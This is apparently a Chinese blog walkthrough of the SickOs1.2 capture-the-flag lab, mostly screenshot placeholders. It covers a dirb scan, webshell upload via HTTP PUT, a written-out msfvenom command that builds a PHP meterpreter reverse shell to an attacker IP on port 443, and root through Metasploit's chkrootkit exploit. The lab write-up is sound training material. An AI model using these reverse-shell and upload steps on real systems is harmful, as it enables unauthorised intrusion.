SickOs1.2

0x00 信息收集

image-20200315180547120

dirb扫目录 发现个test

image-20200315181814090

image-20200315185800832

0x01 获取shell

发现可以PUT 那么试试直接上传文件

image-20200315185640271

image-20200315185902815

连接成功

image-20200315190043984

用的中国蚁剑 打开虚拟终端

image-20200315190529395

image-20200315190947639

0x02 提权

还是老规矩msf走起

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=443 >/root/shell_443.php
用中国蚁剑上传上去 本地监听 拿到shell

image-20200315201428099

shell放到后台 search chkrootokit的exp然后加载到后台shell里
注意这时候443会被重置为exp里设定的4444
由于靶机防火墙不允许非常用端口的使用所以我们需要使用443来操作
重新set lport 443

image-20200315201530617

image-20200315201742942

拿到root!

打赏
  • 版权声明: 本博客所有文章除特别声明外,均采用 Apache License 2.0 许可协议。转载请注明出处!
  • © 2015-2020 Loki
  • Powered by Hexo Theme Ayer
  • PV: UV:

请我喝杯咖啡吧~

支付宝
微信